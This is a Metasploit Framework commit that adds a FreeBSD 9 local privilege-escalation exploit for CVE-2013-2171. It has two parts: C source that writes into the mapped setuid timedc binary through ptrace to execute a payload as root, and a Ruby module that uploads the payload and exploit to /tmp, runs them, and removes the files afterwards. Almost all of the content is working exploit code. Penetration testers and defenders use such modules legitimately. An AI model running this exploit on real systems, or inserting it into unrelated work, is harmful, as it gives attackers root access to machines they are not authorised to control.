Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation Module

2013-06-24 11:50:21 -05:00 · 2013-06-24 11:50:21 -05:00 · 6780566a54
parent 5b0092ff39
commit 6780566a54
3 changed files with 165 additions and 0 deletions
--- a/data/exploits/CVE-2013-2171.bin
+++ b/data/exploits/CVE-2013-2171.bin
--- a/external/source/exploits/CVE-2013-2171/exploit.c
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@ -0,0 +1,54 @@
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+
+#define TG "/usr/sbin/timedc"
+
+/*
+This is based on Hunger's PoC
+*/
+int main(int ac, char **av) {
+   int from_fd, to_fd, status;
+   struct stat st;
+   struct ptrace_io_desc piod;
+   char *s, *d;
+   int pid;
+   char *bin = "/tmp/W00T";  // "W00T" is just a place holder
+
+   if (geteuid() == 0)  {
+        setuid(0);
+        execl(bin, bin, NULL);
+        return 0;
+   }
+
+  from_fd = open(av[0], O_RDONLY);
+  to_fd = open(TG, O_RDONLY);
+  if ( from_fd == -1 || to_fd == -1 )                return 0;
+  if (stat(av[0], &st) == -1)                        return 0;
+
+  s = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, from_fd, (off_t)0);
+  d = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0);
+
+   if (s == MAP_FAILED || d == MAP_FAILED)           return 0;
+   if ((pid = fork()) == -1)                         return 0;
+   if (!pid) {
+        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) return 0;
+  }
+
+   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)        return 0;
+   if (wait(&status) == -1)                          return 0;
+
+   piod.piod_op = PIOD_WRITE_D;
+   piod.piod_offs = d;
+   piod.piod_addr = s;
+   piod.piod_len  = st.st_size;
+
+   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)  return 0;
+   execl(TG, TG, NULL);
+
+  return 0;
+}
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@ -0,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+	Rank = GreatRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
+				'Description'   => %q{
+					This module exploits a vulnerability that can be used to modify portions of
+					a process's address space, which may lead to privilege escalation.  Systems
+					such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        =>
+					[
+						'Konstantin Belousov',   # Discovery
+						'Alan Cox',              # Discovery
+						'Hunger',                # POC
+						'sinn3r'                 # Metasploit
+					],
+				'Platform'      => [ 'bsd' ],
+				'Arch'          => [ ARCH_X86 ],
+				'SessionTypes'  => [ 'shell' ],
+				'References'    =>
+					[
+						[ 'CVE', '2013-2171' ],
+						[ 'OSVDB', '94414' ],
+						[ 'EDB', '26368' ],
+						[ 'BID', '60615' ],
+						[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
+					],
+				'Targets'       =>
+					[
+						[ 'FreeBSD x86', {} ]
+					],
+				'DefaultTarget' => 0,
+				'DisclosureDate' => "Jun 18 2013",
+			}
+		))
+	end
+
+	def write_file(data, fname)
+		oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
+		session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
+		session.shell_command_token("chmod +x #{fname}")
+
+		chk = session.shell_command_token("file #{fname}")
+		return (chk =~ /ERROR: cannot open/) ? false : true
+	end
+
+	def upload_payload
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+		p = generate_payload_exe
+		f = write_file(p, fname)
+		return nil if not f
+		fname
+	end
+
+	def generate_exploit(payload_fname)
+		#
+		# Metasm does not support FreeBSD executable generation.
+		#
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
+		f    = File.open(path, 'rb')
+		x    = f.read(f.stat.size)
+		f.close
+
+		x.gsub(/W00T/, File.basename(payload_fname))
+	end
+
+	def upload_exploit(payload_fname)
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+		bin = generate_exploit(payload_fname)
+		f = write_file(bin, fname)
+		return nil if not f
+		fname
+	end
+
+	def on_new_session(cli)
+		print_warning("Removing #{@payload_fname}")
+		cli.shell_command_token("rm #{@payload_fname}")
+
+		print_warning("Removing #{@exploit_fname}")
+		cli.shell_command_token("rm #{@exploit_fname}")
+	end
+
+	def exploit
+		@payload_fname = upload_payload
+		fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if @payload_fname.nil?
+		print_status("Payload #{@payload_fname} uploaded.")
+
+		@exploit_fname = upload_exploit(@payload_fname)
+		fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if @exploit_fname.nil?
+		print_status("Exploit #{@exploit_fname} uploaded.")
+
+		print_status("Executing #{@exploit_fname}")
+		cmd_exec(@exploit_fname)
+	end
+
+end